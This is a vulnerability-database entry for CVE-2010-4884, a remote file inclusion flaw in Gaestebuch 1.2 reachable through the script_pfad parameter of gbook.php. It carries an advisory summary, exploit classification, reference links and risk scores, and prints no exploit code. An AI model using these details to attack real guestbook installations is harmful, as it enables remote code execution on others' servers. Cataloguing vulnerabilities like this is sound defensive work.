CVE-2010-4884

Gaestebuch 1.2 - Remote Code Execution via script_pfad Parameter

Title source: llm
STIX 2.1

Exploitation Summary

EIP tracks 1 public exploit for CVE-2010-4884. PoCs published by bd0rk.

AI-analyzed exploit summary This exploit demonstrates a Remote File Inclusion (RFI) vulnerability in HINNENDAHL.COM Gaestebuch 1.2. The vulnerability arises from the $script_pfad parameter in /guestbook/gbook.php not being properly sanitized before being used in a require statement, allowing an attacker to execute arbitrary PHP code.

Description

PHP remote file inclusion vulnerability in guestbook/gbook.php in Gaestebuch 1.2 allows remote attackers to execute arbitrary PHP code via a URL in the script_pfad parameter.

Exploits (1)

exploitdb WORKING POC VERIFIED
by bd0rk · textwebappsphp
https://www.exploit-db.com/exploits/14810

This exploit demonstrates a Remote File Inclusion (RFI) vulnerability in HINNENDAHL.COM Gaestebuch 1.2. The vulnerability arises from the $script_pfad parameter in /guestbook/gbook.php not being properly sanitized before being used in a require statement, allowing an attacker to execute arbitrary PHP code.

Classification
Working Poc 90%
Attack Type
Rce
Complexity
Trivial
Reliability
Reliable
Target: HINNENDAHL.COM Gaestebuch 1.2
No auth needed
Prerequisites: Access to the vulnerable gbook.php script · Ability to craft a malicious URL with shellcode
devstral-2 · analyzed Feb 16, 2026 Full analysis →

References (3)

Core 3
Core References
Exploit exploit x_refsource_exploit-db
http://www.exploit-db.com/exploits/14810
Third Party Advisory third-party-advisory x_refsource_sreason
http://securityreason.com/securityalert/8436

Scores

EPSS 0.0599
EPSS Percentile 92.4%

Details

CWE
CWE-94
Status published
Products (1)
hinnendahl/gaestebuch 1.2
Published Oct 07, 2011
Tracked Since Feb 18, 2026